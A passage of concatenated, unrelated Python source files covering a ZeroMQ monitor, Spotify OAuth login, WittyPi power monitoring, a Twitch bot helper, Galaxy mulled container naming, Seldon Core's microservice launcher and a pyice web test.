ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
authentication.py
|
"""
Spotify Terminal authenticates with Spotify by directing
your browser to the locally hosted authentication link.
"""
import json
import os
import requests
import struct
import urllib
import webbrowser
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import common
logger = common.logging.getLogger(__name__)
class Authenticator(object):
"""Authenticate."""
port = 12345
scope = " ".join([
"playlist-modify-private",
"playlist-modify-public",
"playlist-read-collaborative",
"playlist-read-private",
"user-read-email",
"user-read-currently-playing",
"user-read-playback-state",
"user-read-private",
"user-modify-playback-state",
"user-library-modify",
"user-library-read"
])
def __init__(self, username):
self.username = username
self.token_type = None
self.access_token = None
self.refresh_token = None
self.app_data = []
self._init()
def authenticate(self):
# Try to use local auth file.
if not self._auth_from_file():
def start_server():
http_server = HTTPServer(('localhost', self.port), AuthenticationHandler)
http_server.handle_request()
self.data = http_server.data
logger.debug("Starting auth server")
web_thread = Thread(target=start_server)
web_thread.start()
logger.debug("Opening %s in browser", self._authorize_url())
webbrowser.open_new_tab(self._authorize_url())
logger.debug("Waiting for user to complete authentication process")
web_thread.join()
self._get_tokens()
def refresh(self):
logger.debug("Refreshing token")
post_body = {
"grant_type": "refresh_token",
"refresh_token": self.refresh_token,
"client_id": self.app_data[0],
"client_secret": self.app_data[1]
}
resp = requests.post(self._token_url(), data=post_body)
resp.raise_for_status()
data = json.loads(resp.text)
data["refresh_token"] = self.refresh_token
self._save(data)
def _init(self):
# Full disclosure -- This is easy to decode.
# However, this program does not save any of your
# personal information, so none of your data is compromised.
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)), ".st"
)
with open(filename, "rb") as f:
line = "".join([
chr(i-1993) for i in struct.unpack("64I", f.readline())
])
self.app_data.append(line[0:32])
self.app_data.append(line[32::])
def _auth_from_file(self):
required_keys = {"access_token",
"token_type",
"refresh_token"}
found_keys = set()
if os.path.isfile(common.get_auth_filename(self.username)):
with open(common.get_auth_filename(self.username)) as auth_file:
for line in auth_file:
line = line.strip()
toks = line.split("=")
if toks[0] in required_keys:
logger.info("Found %s in auth file", toks[0])
setattr(self, toks[0], toks[1])
found_keys.add(toks[0])
return len(required_keys.symmetric_difference(found_keys)) == 0
else:
return False
def _get_tokens(self):
# First request to get tokens.
post_body = {
"grant_type": "authorization_code",
"code": self.data["code"],
"redirect_uri": "http://localhost:{}/".format(self.port),
"client_id": self.app_data[0],
"client_secret": self.app_data[1]
}
resp = requests.post(self._token_url(), data=post_body)
resp.raise_for_status()
data = json.loads(resp.text)
self._save(data)
def _authorize_url(self):
params = {
"client_id": self.app_data[0],
"redirect_uri": "http://localhost:{}/".format(self.port),
"scope": self.scope,
"response_type": "code",
"show_dialog": True
}
return "https://accounts.spotify.com/authorize" + "?" + urllib.urlencode(params)
def _token_url(self):
return "https://accounts.spotify.com/api/token"
def _save(self, data):
if data:
for key, value in data.items():
setattr(self, key, value)
if not os.path.isdir(common.get_app_dir()):
os.mkdir(common.get_app_dir())
with open(common.get_auth_filename(self.username), "w") as auth_file:
for k, v in data.items():
auth_file.write("%s=%s\n" % (k, v))
logger.debug("%s created", common.get_auth_filename(self.username))
else:
try:
os.remove(common.get_auth_filename(self.username))
logger.debug("%s deleted", common.get_auth_filename(self.username))
except OSError:
pass
class AuthenticationHandler(BaseHTTPRequestHandler):
HTML = """
<html>
You may close this tab, and continue jamming in your terminal!
<script type="text/javascript">
window.close();
</script>
</html>
"""
def do_GET(self):
if "code=" in self.path:
self.server.data = self.parse_path(self.path[2::])
self.send_response(200)
self.end_headers()
self.wfile.write(self.HTML)
def parse_path(self, path):
data = {}
items = path.split("&")
for thing in items:
toks = thing.split("=")
data[toks[0]] = toks[1]
return data
def log_message(self, format, *args):
logger.debug(format, *args)
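# Usage sketch (illustrative; "my_username" is a placeholder): authenticate once,
# which opens a browser tab on first run and caches the tokens to the auth file,
# then call refresh() whenever Spotify reports that the access token has expired.
#
# auth = Authenticator("my_username")
# auth.authenticate()
# auth.refresh()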
|
wittypi.py
|
import time
import queue
from multiprocessing import Process, Queue, Event
from py_wittypi_device import WittyPiDevice
class VoltageMonitor:
def __init__(self,config):
self.median_values = config['Voltage'].getint('median_values')
self.median_dt = config['Voltage'].getfloat('median_dt')
self.device = WittyPiDevice()
@property
def input_voltage(self):
value = self.device.get_median_input_voltage(
self.median_values,
self.median_dt
)
return value
@property
def output_voltage(self):
value = self.device.get_median_output_voltage(
self.median_values,
self.median_dt
)
return value
class CurrentMonitor:
def __init__(self,config):
self.pause_dt = config['Current'].getfloat('pause_dt')
self.data_queue = Queue()
self.done_event = Event()
self.task = CurrentMonitorTask(config, self.data_queue, self.done_event)
self.process = Process(target=self.task.run,daemon=True)
def start(self):
self.process.start()
time.sleep(self.pause_dt)
def stop(self):
time.sleep(self.pause_dt)
self.done_event.set()
@property
def data(self):
done = False
t_list = []
i_list = []
while not done:
try:
item = self.data_queue.get(False)
t_list.append(item['t'])
i_list.append(item['i'])
except queue.Empty:
done = True
return {'t': t_list, 'i': i_list }
class CurrentMonitorTask:
def __init__(self,config,data_queue,done_event):
self.median_values = config['Current'].getint('median_values')
self.median_dt = config['Current'].getfloat('median_dt')
self.sample_dt = config['Current'].getfloat('sample_dt')
self.data_queue = data_queue
self.done_event = done_event
def run(self):
device = WittyPiDevice()
while not self.done_event.is_set():
current = device.get_median_output_current(
self.median_values,
self.median_dt
)
t = time.time()
data = {'t': t, 'i': current}
self.data_queue.put(data)
time.sleep(self.sample_dt)
# -----------------------------------------------------------------------------
if __name__ == '__main__':
print('hello')
# CurrentMonitor needs a config object; build a minimal one here with example
# values (the real application reads these from its .ini configuration file).
import configparser
config = configparser.ConfigParser()
config['Current'] = {'median_values': '3', 'median_dt': '0.01', 'sample_dt': '0.1', 'pause_dt': '0.5'}
monitor = CurrentMonitor(config)
monitor.start()
for i in range(10):
print(i)
time.sleep(1.0)
print()
monitor.stop()
curr_data = monitor.data
print(curr_data)
|
common.py
|
# common.py
# Tom Taylor / Version Control
# 2021
from os import environ
from threading import Thread
from playsound import playsound
from twitchio.ext import commands
# CONFIG ------------------------------
bot = commands.Bot(
irc_token=environ['TMI_TOKEN'],
client_id=environ['CLIENT_ID'],
nick=environ['BOT_NICK'],
prefix=environ['BOT_PREFIX'],
initial_channels=[environ['CHANNEL']],
client_secret=environ['CLIENT_SECRET']
)
# GLOBALS ----------------------------
streamer_info = None
# HELPERS ----------------------------
def set_streamer_info(new_streamer_info):
'Should be called as soon as a connection to chat is made. Stores data about the streamer for later lookups.'
global streamer_info
streamer_info = new_streamer_info
def play_sound(sfxpath):
'Play a sound effect'
Thread(target=playsound, args=(sfxpath,), daemon=True).start()
async def does_user_follow_streamer(follower_user_id : int) -> bool:
'Returns True if the user passed as a parameter is following the streamer, False if not'
if follower_user_id == int(streamer_info.id):
return True
user_follows_streamer = await bot.get_follow(follower_user_id, streamer_info.id)
return (user_follows_streamer is not None) and ('followed_at' in user_follows_streamer) and (user_follows_streamer['followed_at'] != '')
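# Usage sketch (illustrative; the user id and sound path are placeholders, and
# set_streamer_info() must already have been called after connecting to chat):
#
# async def greet_if_follower(user_id: int):
#     if await does_user_follow_streamer(user_id):
#         play_sound("sfx/welcome.mp3")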
|
b.py
|
import threading
def thread_job():
print("This is an added Thread, number is %s" % threading.current_thread())
def main():
added_thread = threading.Thread(target=thread_job)
# # Check how many threads are currently running in this process
# print(threading.active_count())
# # Return a list of the threads that are currently running
# print(threading.enumerate())
# # The thread that is currently executing
# print(threading.current_thread())
added_thread.start()
if __name__ == "__main__":
main()
|
util.py
|
"""Utilities for working with mulled abstractions outside the mulled package."""
import collections
import hashlib
import logging
import re
import sys
import tarfile
import threading
from io import BytesIO
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
BUILD_NUMBER_REGEX = re.compile(r'\d+$')
PARSED_TAG = collections.namedtuple('PARSED_TAG', 'tag version build_string build_number')
QUAY_IO_TIMEOUT = 10
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers, timeout=QUAY_IO_TIMEOUT)
def quay_versions(namespace, pkg_name, session=None):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name, session=session)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'].keys() if tag != 'latest']
def quay_repository(namespace, pkg_name, session=None):
assert namespace is not None
assert pkg_name is not None
url = f'https://quay.io/api/v1/repository/{namespace}/{pkg_name}'
if not session:
session = requests.session()
response = session.get(url, timeout=QUAY_IO_TIMEOUT)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Check whether the given quay.io namespace (e.g. biocontainers) contains a repository named repo_name.
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=QUAY_IO_TIMEOUT)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None, session=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
# Following check is pretty expensive against biocontainers... don't even bother doing it
# if can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.info("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image, session)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image tag into conda version and conda build."""
return tag.rsplit('--', 1)
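# Example (verifiable from the implementation above):
# split_tag('1.3.1--py_1') -> ['1.3.1', 'py_1']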
def parse_tag(tag):
"""Decompose tag of mulled images into version, build string and build number."""
version = tag.rsplit(':')[-1]
build_string = "-1"
build_number = -1
match = BUILD_NUMBER_REGEX.search(version)
if match:
build_number = int(match.group(0))
if '--' in version:
version, build_string = version.rsplit('--', 1)
elif '-' in version:
# Should be mulled multi-container image tag
version, build_string = version.rsplit('-', 1)
else:
# We don't have a build number, and the BUILD_NUMBER_REGEX above is only accurate for build strings,
# so set build number to -1. Any matching image:version combination with a build number
# will be considered newer.
build_number = -1
return PARSED_TAG(tag=tag,
version=packaging.version.parse(version),
build_string=packaging.version.parse(build_string),
build_number=build_number)
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
elements = (parse_tag(tag) for tag in elements)
elements = sorted(elements, key=lambda tag: tag.build_string, reverse=True)
elements = sorted(elements, key=lambda tag: tag.build_number, reverse=True)
elements = sorted(elements, key=lambda tag: tag.version, reverse=True)
return [e.tag for e in elements]
Target = collections.namedtuple("Target", ["package_name", "version", "build", "package"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
# conda package and quay image names are lowercase
return Target(package_name.lower(), version, build, package_name)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
build = target.build
if build is None and image_build is not None and image_build != "0":
# Special case image_build == "0", which has been built without a suffix
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
build = image_build
suffix += ":%s" % target.version
if build is not None:
suffix += "--%s" % build
return f"{target.package_name}{suffix}"
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return f"mulled-v1-{m.hexdigest()}{suffix}"
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1--py_1'
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1--py_1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
# tagged version is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = f":{version_hash_str}{build_suffix}"
return f"mulled-v2-{package_hash.hexdigest()}{suffix}"
def get_file_from_recipe_url(url):
"""Downloads file at url and returns tarball"""
r = requests.get(url)
return tarfile.open(mode="r:bz2", fileobj=BytesIO(r.content))
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress:
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = threading.Event()
def progress(self):
while not self.stop.is_set():
print(".", end="")
sys.stdout.flush()
self.stop.wait(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop.set()
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
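# Usage sketch (illustrative; the tag lookup needs network access to quay.io):
# build a two-package target list, derive its mulled-v2 image name, and list the
# matching tags in the biocontainers namespace, newest first.
#
# targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
# name = v2_image_name(targets)
# tags = mulled_tags_for("biocontainers", name.split(":")[0])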
|
microservice.py
|
import argparse
import os
import importlib
import json
import time
import logging
import multiprocessing as mp
import threading
import sys
from typing import Dict, Callable
from distutils.util import strtobool
from seldon_core import persistence, __version__, wrapper as seldon_microservice
from seldon_core.metrics import SeldonMetrics
from seldon_core.flask_utils import ANNOTATIONS_FILE, SeldonMicroserviceException
from seldon_core.utils import getenv_as_bool
from seldon_core.app import (
StandaloneApplication,
UserModelApplication,
accesslog,
threads,
post_worker_init,
)
logger = logging.getLogger(__name__)
PARAMETERS_ENV_NAME = "PREDICTIVE_UNIT_PARAMETERS"
SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_SERVICE_PORT"
METRICS_SERVICE_PORT_ENV_NAME = "PREDICTIVE_UNIT_METRICS_SERVICE_PORT"
FILTER_METRICS_ACCESS_LOGS_ENV_NAME = "FILTER_METRICS_ACCESS_LOGS"
LOG_LEVEL_ENV = "SELDON_LOG_LEVEL"
DEFAULT_LOG_LEVEL = "INFO"
DEFAULT_PORT = 5000
DEFAULT_METRICS_PORT = 6000
DEBUG_ENV = "SELDON_DEBUG"
def start_servers(
target1: Callable, target2: Callable, metrics_target: Callable
) -> None:
"""
Start servers
Parameters
----------
target1
Main flask process
target2
Auxiliary flask process
metrics_target
Metrics flask process
"""
p2 = None
if target2:
p2 = mp.Process(target=target2, daemon=True)
p2.start()
p3 = None
if metrics_target:
p3 = mp.Process(target=metrics_target, daemon=True)
p3.start()
target1()
if p2:
p2.join()
if p3:
p3.join()
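# Usage sketch (illustrative; the three callables are placeholders named after the
# servers that main() wires up below): target1 runs in the current process while
# the other two run as daemon subprocesses.
#
# start_servers(rest_prediction_server, None, rest_metrics_server)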
def parse_parameters(parameters: Dict) -> Dict:
"""
Parse the user object parameters
Parameters
----------
parameters
Returns
-------
"""
type_dict = {
"INT": int,
"FLOAT": float,
"DOUBLE": float,
"STRING": str,
"BOOL": bool,
}
parsed_parameters = {}
for param in parameters:
name = param.get("name")
value = param.get("value")
type_ = param.get("type")
if type_ == "BOOL":
parsed_parameters[name] = bool(strtobool(value))
else:
try:
parsed_parameters[name] = type_dict[type_](value)
except ValueError:
raise SeldonMicroserviceException(
"Bad model parameter: "
+ name
+ " with value "
+ value
+ " can't be parsed as a "
+ type_,
reason="MICROSERVICE_BAD_PARAMETER",
)
except KeyError:
raise SeldonMicroserviceException(
"Bad model parameter type: "
+ type_
+ " valid are INT, FLOAT, DOUBLE, STRING, BOOL",
reason="MICROSERVICE_BAD_PARAMETER",
)
return parsed_parameters
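# Example (illustrative) of the parameter payload this function expects, as it
# arrives via the PREDICTIVE_UNIT_PARAMETERS environment variable after json.loads:
#
# parse_parameters([{"name": "threshold", "value": "0.5", "type": "FLOAT"},
#                   {"name": "verbose", "value": "true", "type": "BOOL"}])
# -> {"threshold": 0.5, "verbose": True}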
def load_annotations() -> Dict:
"""
Attempt to load annotations
Returns
-------
"""
annotations = {}
try:
if os.path.isfile(ANNOTATIONS_FILE):
with open(ANNOTATIONS_FILE, "r") as ins:
for line in ins:
line = line.rstrip()
parts = list(map(str.strip, line.split("=", 1)))
if len(parts) == 2:
key = parts[0]
value = parts[1][1:-1] # strip quotes at start and end
logger.info("Found annotation %s:%s ", key, value)
annotations[key] = value
else:
logger.info("Bad annotation [%s]", line)
except:
logger.error("Failed to open annotations file %s", ANNOTATIONS_FILE)
return annotations
def setup_tracing(interface_name: str) -> object:
logger.info("Initializing tracing")
from jaeger_client import Config
jaeger_serv = os.environ.get("JAEGER_AGENT_HOST", "0.0.0.0")
jaeger_port = os.environ.get("JAEGER_AGENT_PORT", 5775)
jaeger_config = os.environ.get("JAEGER_CONFIG_PATH", None)
if jaeger_config is None:
logger.info("Using default tracing config")
config = Config(
config={ # usually read from some yaml config
"sampler": {"type": "const", "param": 1},
"local_agent": {
"reporting_host": jaeger_serv,
"reporting_port": jaeger_port,
},
"logging": True,
},
service_name=interface_name,
validate=True,
)
else:
logger.info("Loading tracing config from %s", jaeger_config)
import yaml
with open(jaeger_config, "r") as stream:
config_dict = yaml.load(stream)
config = Config(
config=config_dict, service_name=interface_name, validate=True
)
# this call also sets opentracing.tracer
return config.initialize_tracer()
class MetricsEndpointFilter(logging.Filter):
def filter(self, record):
return seldon_microservice.METRICS_ENDPOINT not in record.getMessage()
def setup_logger(log_level: str, debug_mode: bool) -> logging.Logger:
# set up log level
log_level_raw = os.environ.get(LOG_LEVEL_ENV, log_level.upper())
log_level_num = getattr(logging, log_level_raw, None)
if not isinstance(log_level_num, int):
raise ValueError("Invalid log level: %s", log_level)
logger.setLevel(log_level_num)
# Set right level on access logs
flask_logger = logging.getLogger("werkzeug")
flask_logger.setLevel(log_level_num)
if getenv_as_bool(FILTER_METRICS_ACCESS_LOGS_ENV_NAME, default=not debug_mode):
flask_logger.addFilter(MetricsEndpointFilter())
gunicorn_logger = logging.getLogger("gunicorn.access")
gunicorn_logger.addFilter(MetricsEndpointFilter())
logger.debug("Log level set to %s:%s", log_level, log_level_num)
# set log level for the imported microservice type
seldon_microservice.logger.setLevel(log_level_num)
logging.getLogger().setLevel(log_level_num)
for handler in logger.handlers:
handler.setLevel(log_level_num)
return logger
def main():
LOG_FORMAT = (
"%(asctime)s - %(name)s:%(funcName)s:%(lineno)s - %(levelname)s: %(message)s"
)
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
logger.info("Starting microservice.py:main")
logger.info(f"Seldon Core version: {__version__}")
sys.path.append(os.getcwd())
parser = argparse.ArgumentParser()
parser.add_argument("interface_name", type=str, help="Name of the user interface.")
parser.add_argument("api_type", type=str, choices=["REST", "GRPC", "FBS"])
parser.add_argument(
"--service-type",
type=str,
choices=["MODEL", "ROUTER", "TRANSFORMER", "COMBINER", "OUTLIER_DETECTOR"],
default="MODEL",
)
parser.add_argument("--persistence", nargs="?", default=0, const=1, type=int)
parser.add_argument(
"--parameters", type=str, default=os.environ.get(PARAMETERS_ENV_NAME, "[]")
)
parser.add_argument(
"--log-level",
type=str,
choices=["DEBUG", "INFO", "WARNING", "ERROR"],
default=DEFAULT_LOG_LEVEL,
help="Log level of the inference server.",
)
parser.add_argument(
"--debug",
nargs="?",
type=bool,
default=getenv_as_bool(DEBUG_ENV, default=False),
const=True,
help="Enable debug mode.",
)
parser.add_argument(
"--tracing",
nargs="?",
default=int(os.environ.get("TRACING", "0")),
const=1,
type=int,
)
# gunicorn settings, defaults are from
# http://docs.gunicorn.org/en/stable/settings.html
parser.add_argument(
"--workers",
type=int,
default=int(os.environ.get("GUNICORN_WORKERS", "1")),
help="Number of Gunicorn workers for handling requests.",
)
parser.add_argument(
"--threads",
type=int,
default=int(os.environ.get("GUNICORN_THREADS", "10")),
help="Number of threads to run per Gunicorn worker.",
)
parser.add_argument(
"--max-requests",
type=int,
default=int(os.environ.get("GUNICORN_MAX_REQUESTS", "0")),
help="Maximum number of requests gunicorn worker will process before restarting.",
)
parser.add_argument(
"--max-requests-jitter",
type=int,
default=int(os.environ.get("GUNICORN_MAX_REQUESTS_JITTER", "0")),
help="Maximum random jitter to add to max-requests.",
)
parser.add_argument(
"--single-threaded",
type=int,
default=int(os.environ.get("FLASK_SINGLE_THREADED", "0")),
help="Force the Flask app to run single-threaded. Also applies to Gunicorn.",
)
parser.add_argument(
"--port",
type=int,
default=int(os.environ.get(SERVICE_PORT_ENV_NAME, DEFAULT_PORT)),
help="Set port of seldon service",
)
parser.add_argument(
"--metrics-port",
type=int,
default=int(
os.environ.get(METRICS_SERVICE_PORT_ENV_NAME, DEFAULT_METRICS_PORT)
),
help="Set metrics port of seldon service",
)
args = parser.parse_args()
parameters = parse_parameters(json.loads(args.parameters))
setup_logger(args.log_level, args.debug)
# set flask trace jaeger extra tags
jaeger_extra_tags = list(
filter(
lambda x: (x != ""),
[tag.strip() for tag in os.environ.get("JAEGER_EXTRA_TAGS", "").split(",")],
)
)
logger.info("Parse JAEGER_EXTRA_TAGS %s", jaeger_extra_tags)
annotations = load_annotations()
logger.info("Annotations: %s", annotations)
parts = args.interface_name.rsplit(".", 1)
if len(parts) == 1:
logger.info("Importing %s", args.interface_name)
interface_file = importlib.import_module(args.interface_name)
user_class = getattr(interface_file, args.interface_name)
else:
logger.info("Importing submodule %s", parts)
interface_file = importlib.import_module(parts[0])
user_class = getattr(interface_file, parts[1])
if args.persistence:
logger.info("Restoring persisted component")
user_object = persistence.restore(user_class, parameters)
persistence.persist(user_object, parameters.get("push_frequency"))
else:
user_object = user_class(**parameters)
port = args.port
metrics_port = args.metrics_port
if args.tracing:
tracer = setup_tracing(args.interface_name)
if args.api_type == "REST":
seldon_metrics = SeldonMetrics(worker_id_func=os.getpid)
if args.debug:
# Start Flask debug server
def rest_prediction_server():
app = seldon_microservice.get_rest_microservice(
user_object, seldon_metrics
)
try:
user_object.load()
except (NotImplementedError, AttributeError):
pass
if args.tracing:
logger.info("Tracing branch is active")
from flask_opentracing import FlaskTracing
logger.info("Set JAEGER_EXTRA_TAGS %s", jaeger_extra_tags)
FlaskTracing(tracer, True, app, jaeger_extra_tags)
app.run(
host="0.0.0.0",
port=port,
threaded=False if args.single_threaded else True,
)
logger.info(
"REST microservice running on port %i single-threaded=%s",
port,
args.single_threaded,
)
server1_func = rest_prediction_server
else:
# Start production server
def rest_prediction_server():
options = {
"bind": "%s:%s" % ("0.0.0.0", port),
"accesslog": accesslog(args.log_level),
"loglevel": args.log_level.lower(),
"timeout": 5000,
"threads": threads(args.threads, args.single_threaded),
"workers": args.workers,
"max_requests": args.max_requests,
"max_requests_jitter": args.max_requests_jitter,
"post_worker_init": post_worker_init,
}
app = seldon_microservice.get_rest_microservice(
user_object, seldon_metrics
)
UserModelApplication(app, user_object, options=options).run()
logger.info("REST gunicorn microservice running on port %i", port)
server1_func = rest_prediction_server
elif args.api_type == "GRPC":
seldon_metrics = SeldonMetrics(
worker_id_func=lambda: threading.current_thread().name
)
def grpc_prediction_server():
if args.tracing:
from grpc_opentracing import open_tracing_server_interceptor
logger.info("Adding tracer")
interceptor = open_tracing_server_interceptor(tracer)
else:
interceptor = None
server = seldon_microservice.get_grpc_server(
user_object,
seldon_metrics,
annotations=annotations,
trace_interceptor=interceptor,
)
try:
user_object.load()
except (NotImplementedError, AttributeError):
pass
server.add_insecure_port(f"0.0.0.0:{port}")
server.start()
logger.info("GRPC microservice Running on port %i", port)
while True:
time.sleep(1000)
server1_func = grpc_prediction_server
else:
server1_func = None
def rest_metrics_server():
app = seldon_microservice.get_metrics_microservice(seldon_metrics)
if args.debug:
app.run(host="0.0.0.0", port=metrics_port)
else:
options = {
"bind": "%s:%s" % ("0.0.0.0", metrics_port),
"accesslog": accesslog(args.log_level),
"loglevel": args.log_level.lower(),
"timeout": 5000,
"max_requests": args.max_requests,
"max_requests_jitter": args.max_requests_jitter,
"post_worker_init": post_worker_init,
}
StandaloneApplication(app, options=options).run()
logger.info("REST metrics microservice running on port %i", metrics_port)
metrics_server_func = rest_metrics_server
if hasattr(user_object, "custom_service") and callable(
getattr(user_object, "custom_service")
):
server2_func = user_object.custom_service
else:
server2_func = None
logger.info("Starting servers")
start_servers(server1_func, server2_func, metrics_server_func)
if __name__ == "__main__":
main()
|
web_test.py
|
import asyncio
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except:
print("Warning: Unable to initialize uvloop")
from pyice import web_async
from pyice import web
import threading
import time
server = web.Server(web.ServerConfig().set_num_executors(3).set_listen_addr("127.0.0.1:2716"))
@server.define_route("/hello_world")
def hello_world(req):
req.create_response().set_body("Hello world!").send()
@server.define_route("/hello_world_threaded")
def hello_world_threaded(req):
